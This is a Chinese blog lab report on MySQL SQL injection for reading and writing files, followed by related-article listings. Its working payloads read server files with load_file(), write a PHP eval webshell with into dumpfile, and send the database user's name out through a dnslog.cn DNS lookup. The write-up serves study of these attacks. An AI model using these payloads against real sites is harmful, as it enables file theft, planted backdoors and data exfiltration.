SQl注入之读写文件注入实验报告

最新推荐文章于 2025-09-26 17:54:47 发布
原创 最新推荐文章于 2025-09-26 17:54:47 发布 · 624 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文探讨了MySQL中secure_file_priv参数对文件读写权限的影响,包括无限制、禁止及指定路径下的读写操作。通过load_file()和intooutfile演示了如何在不同权限设置下读取和写入文件。

读写文件受到权限影响
      secure_file_priv=   代表文件读写没有限制
      secure_file_priv=NULL   代表没有读写文件权限
      secure_file_priv=    d:/phpstudy/mysql/aa  代表只能对该路径下文件进行读写
      这个权限在数据库配置文件my.ini里,默认是没有的

读文件
     load_file()

写文件
     into outfile
     into dumpfile  写二进制文件使用

实验1读文件

    首先在my.ini里添加secure_file_priv=

然后用用@@datadir 爆出mysql路径

?id=-1 union select 1,@@datadir,3

有了路径就可以读以my.ini文件试试

 

?id=-1union select 1,load_file("D:\\php\\PHPTutorial\\MySQL\\my.ini"),3

实验二写文件

知道了路径之后可以写一些一句话木马类的文件到网站目录下

?id=-1 union select "","<?php @eval($_REQUEST(666)?>","" into dumpfile"d:\\1.txt" --

实验三外带注入

  先到dnslog.cn网站get一下

  拿到

然后

 

?id=1' and load_file(concat("\\\\",hex(user()),".7iva9u.dnslog.cn\\xxx.txt")) -- -

 加上16进制拿用户名

拿到16进制后的去找个网站转换一下

Devil_ping
关注
实验报告实验三 XSS和SQL注入
m0_52108440的博客
12-13 1965
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA 实验步骤: XSS部分:利用Beef劫持被攻击者客户端浏览器。 实验环境搭建。.
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
SQL注入相关实验报告.doc
01-05
将恶意的SQL命令插入到输入域名或页面请求的查询字符串注入到后台数据库,输入恶意SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
SQL注入-报错注入
最新发布
m0_74040194的博客
09-26 644
其本质是利用数据库或应用程序的错误机制,将SQL查询的结果(如数据库结构、敏感数据等)通过错误信息直接“泄露给攻击者的技术手段。说的通俗点就是“报错注入就是想办法出发数据库的错误,并从中获取我们想要得到的数据”存在SQL注入点;并且数据库错误会显示到页面。例如SQLI-LABS的less-2,我们可以很明显的看到错误是爆露在页面的。​在日常攻击中,通常先尝试报错注入,失败后再使用盲注。因为报错注入的效率更高,盲注过程中需要判断每一个字符的大小,这无疑增添了工作的难度和时间。
SQL注入项目报告(全英文)
10-09
这是我课程的项目报告,详细介绍了SQL注入漏洞的原理和手动检测方法,最后针对一种简单的SQL注入漏洞设计了一个自动检测漏洞的软件,该软件的基本架构是自己写的一个网络爬虫,希望对大家有帮助.软件的源代码过几天我也会上传我的资源里面
SQL注入实验报告
热门推荐
fencecat的博客
12-31 1万+
实验项目 SQL注入 综合性实验 2020年9月25日 一、实验综述 1.实验目的及要求 创建VMWARE虚拟机 的Windows环境, 在虚拟机中安装phpstudy,并搭建DVWA环境,通过学习web工作原理与SQL注入工作原理,能够实现简单的SQL注入验证。 2.实验仪器、设备或软件 Vmware DVWA phpStudy 3.实验原理 (1)Web工作原理: Web服务器的本质就是 接收数据 ⇒ HTTP解析 ⇒ 逻辑处理 ⇒ HTTP封包 ⇒ 发送数据。 Web服务器的工作流...
1+X 网络安全运营平台与管理 sql注入实验报告
路baby的博客
11-18 2505
项目化考核 1+X 证书(网络安全运营平台管理) sql注入实验报告 实验目的:实验设备 (环境)实验要求:实验原理:实验步骤:实验总结:
javaEE开发技术实验报告.rar
06-17
实验报告文件名称"3120170901211-金学松-实验"可能是学生ID或姓名的组合,表明这是金学松同学在2017年某个时间完成的JavaEE开发技术实验报告。这份报告详细记录了使用上述技术进行实际项目开发的过程,可能包括...
浙科系统电子商务实验报告分析与开店指南
3. **安全防护**:要保证用户信息和交易数据的安全,需要实现SSL加密、防止SQL注入、XSS攻击等多种安全防护措施。 4. **用户体验优化**:网站加载速度、界面设计、交互流程等用户体验方面的优化,对于吸引和保留...
Java实验报告合集:20个Eclipse项目含源码与环境配置
通过深入分析该压缩包所包含的内容(文件名为“java实验报告”),可以提炼出多个关键知识点,涵盖Java基础语法、面向对象编程思想、异常处理机制、集合框架使用、IO流操作、多线程编程、图形用户界面(GUI)设计、...
JAVA实验报告-数据库编程.docx
09-30
实验报告中,主要目标是掌握Java数据库编程的基本功能,包括连接数据库、执行SQL语句以及处理结果。 首先,你需要了解JDBC驱动,如MySQL JDBC驱动(也称为Connector/J),它使得Java应用程序能够连接到MySQL...
图书管理系统个人实验报告.docx
07-02
### 图书管理系统个人实验报告知识点总结 #### 一、项目背景与目的 - **时代背景**: 21世纪以来,随着计算机技术的迅速发展及其在经济和社会生活各领域的广泛应用,原有的传统管理方式已逐渐落后,难以满足现代社会...
中科大信安SQL注入报告
07-11
中科大信息安全导论实验18年春
sql注入论文
01-08
关于SQL注入步骤及预防攻略,具体设计到access和sqlserver
SQL注入总结
KHOST的博客
11-29 867
SQL注入的攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。 可显注入 攻击者可以直接在当前界面内容中获取想要获得的内容。 报错注入 数据库查询返回结果并没有在页面中显示,但是应用程序将数据库报错信息打印到了页面中,所以攻击者可以构造数据库报错语句,从报错信息中获取想要获得的内容。 盲注 数据库查询结果无法从直观页面中获取,攻击者通过使用数据库逻辑或使数...
sql注入读写文件案例实验
千寻的博客
02-21 702
文章目录环境搭建第一节 前提条件第二节 读取文件操作第三节 写入文件操作免责声明 环境搭建 Window-server2008 —phpstudy-----搭建自己的网页 第一节 前提条件 我们也可以利用SQL 注入漏洞读写文件。但是读写文件需要一定的条件。 1.secure-file-priv 改参数可以写在my.ini 配置文件中[mysqld] 下。若要配置此参数,需要修改my.ini ...
mysql实验报告3_Web安全技术 实验报告SQL注入
weixin_42589700的博客
01-19 639
一、SQL注入1.数字型注入随便选一个,抓包可以看到是POST直接加一个真命题可以看到都爆出来了。2.字符型注入先输入‘ 有报错,所以存在SQL注入。我们直接构造payload:1' or 1=1#OK3.搜索型注入也是加单引号,发现报错,存在SQL注入点。这个类型,我们推测用的是SQL语句中的like来进行模糊判断那我们就可以猜测模糊查询的字段应该是'%查询内容%'那么我可以构造1%' or 1...
网络安全——SQL注入实验
网络工程
12-12 5827
1、掌握SQL注入的原理。2、通过开源网站渗透平台DVWA实战,掌握常见的SQL注入方法。3、具体内容:1)学习配置开源网站渗透平台DVWA(Damn Vulnerable Web Application)。2)学习常见的SQL语句:create、select、drop、union等。3)学习相关SQL注入方法并在实验平台验证。
sqlmap进行sql注入测试的报告
weixin_35752233的博客
02-08 515
sqlmap是一款开源的SQL注入自动化工具。它可以帮助渗透测试人员自动化地扫描Web应用程序并检测SQL注入漏洞。 在进行SQL注入测试时,sqlmap会尝试将恶意SQL语句注入到Web应用程序的输入字段中,并检测程序是否可以执行这些语句。如果程序可以执行恶意语句,则说明存在SQL注入漏洞。 在测试结束后,sqlmap会生成一份报告,其中包含测试结果、发现的漏洞信息以及执行的SQL注入攻击。这份...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值